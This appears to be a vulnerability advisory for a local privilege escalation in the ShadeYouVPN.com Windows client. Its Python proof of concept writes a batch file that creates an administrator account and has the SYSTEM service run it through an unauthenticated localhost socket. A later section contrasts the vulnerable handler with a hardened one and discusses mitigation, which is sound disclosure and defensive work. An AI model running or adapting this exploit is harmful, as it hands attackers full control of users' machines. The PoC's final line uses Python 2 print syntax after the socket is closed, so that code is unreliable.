ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation

Homepage:

https://shadeyouvpn.com/

Description:

The ShadeYou service runs as a SYSTEM process; its service account is LocalSystem:

wmic service where name="ShadeYou" get StartName
StartName
LocalSystem

The service executes any file path it is handed, as the SYSTEM user, without verifying who sent the request or what the path points to.

An unprivileged local user only needs to send the path over a TCP connection to the service's listener on 127.0.0.1:10295, in the pipe-separated message format used below. The proof of concept writes a batch file that creates a local user "shade" and adds it to the Administrators group, then asks the service to run that file.

Proof of Concept:


#!/usr/bin/env python3
# Run as an unprivileged local user on a machine with the vulnerable client installed.
import socket
import tempfile

print("ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation")
print("by Kacper Szurek")
print("https://security.szurek.pl/")
print("https://twitter.com/KacperSzurek")

# Batch file payload: create a local user and make it an administrator.
# delete=False keeps the file on disk after close() so the service can open it.
t = tempfile.NamedTemporaryFile(mode="w", delete=False, suffix=".bat")
t.write("net user shade /add\n")
t.write("net localgroup administrators shade /add\n")
t.close()

# The service listens on localhost and requires no authentication.
s = socket.socket()
s.connect(("127.0.0.1", 10295))

# Message format: 's||config|<path>|...'. The fields after the path are
# placeholder values; the service runs the path in the fourth field as SYSTEM.
s.send(("s||config|" + t.name + "|ccccc|ddddd|eeee|ffff|\r\n").encode())
print(s.recv(1024))
print(s.recv(1024))
s.close()
print s.recv(1024)
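The handler pattern the description above attributes to the service, modelled as an added example next to a hardened version. This is illustration code, not the advisory's exploit and not ShadeYou's own source: only the message layout (pipe-separated, path in the fourth field) is taken from the proof of concept; the check on the leading fields, the allowlisted directory and the batch-only extension rule are assumptions. A runner callable is injected so the example can be exercised without executing anything.

```python
"""Added example: a SYSTEM-style 'run this path' handler, vulnerable and hardened.

The message layout is inferred from the advisory's PoC; the field meanings,
the allowlist directory and the extension rule are assumptions for illustration.
"""
import os
import subprocess
import tempfile

ALLOWED_EXTENSIONS = (".bat", ".cmd")   # assumed: the service only needs batch files


def parse_message(raw):
    """Pull the path out of 's||config|<path>|...|\\r\\n'.

    The position of the path comes from the PoC; treating field 0 == 's' and
    field 2 == 'config' as the command selector is an assumption.
    """
    fields = raw.rstrip("\r\n").split("|")
    if len(fields) < 4 or fields[0] != "s" or fields[2] != "config":
        raise ValueError("unexpected message layout: %r" % raw)
    return fields[3]


def run_file(path):
    """Execute a file the way a Windows service might (cmd.exe picks the handler)."""
    return subprocess.call(path, shell=True)


def vulnerable_handler(raw, runner=run_file):
    """The pattern the advisory describes: whatever path arrives gets executed."""
    return runner(parse_message(raw))


def path_is_allowed(path, allowed_dir):
    """True only if path resolves to a regular batch file inside allowed_dir.

    realpath() collapses '..' and follows symlinks/junctions, so a link placed
    inside allowed_dir that points elsewhere is rejected as well.
    """
    real = os.path.realpath(path)
    base = os.path.realpath(allowed_dir)
    try:
        inside = os.path.commonpath([real, base]) == base
    except ValueError:          # different drives on Windows
        inside = False
    return (inside
            and real != base
            and os.path.isfile(real)
            and os.path.splitext(real)[1].lower() in ALLOWED_EXTENSIONS)


def hardened_handler(raw, allowed_dir, runner=run_file):
    """Same protocol, but refuses anything outside the allowlisted directory.

    Returns None when the request is refused, otherwise the runner's result.
    """
    path = parse_message(raw)
    if not path_is_allowed(path, allowed_dir):
        return None
    return runner(os.path.realpath(path))


def make_sample_tree():
    """Constructed fixture: an allowlisted scripts dir plus files to test against."""
    root = os.path.realpath(tempfile.mkdtemp())
    scripts = os.path.join(root, "scripts")
    os.mkdir(scripts)
    paths = {
        "scripts": scripts,
        "ok": os.path.join(scripts, "update.bat"),          # legitimate
        "exe": os.path.join(scripts, "tool.exe"),           # wrong type
        "outside": os.path.join(root, "payload.bat"),       # attacker-controlled
        "traversal": os.path.join(scripts, "..", "payload.bat"),
        "missing": os.path.join(scripts, "missing.bat"),
    }
    for key in ("ok", "exe", "outside"):
        with open(paths[key], "w") as fh:
            fh.write("@echo off\r\n")
    return paths


if __name__ == "__main__":
    p = make_sample_tree()
    record = lambda path: ("ran", path)   # stand-in runner that executes nothing
    attack = "s||config|%s|ccccc|ddddd|eeee|ffff|\r\n" % p["outside"]
    print("vulnerable:", vulnerable_handler(attack, runner=record))
    print("hardened:  ", hardened_handler(attack, p["scripts"], runner=record))
```

The allowlist is a mitigation, not the whole fix: it only helps if the allowlisted directory's ACL stops standard users from writing to it (otherwise they just drop their batch file there), and the root cause is a SYSTEM service accepting a file path from an unauthenticated local client at all. A service that needs to run helper scripts should select them from a fixed internal list, or at least authenticate the caller, rather than take a path off the wire.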

Timeline: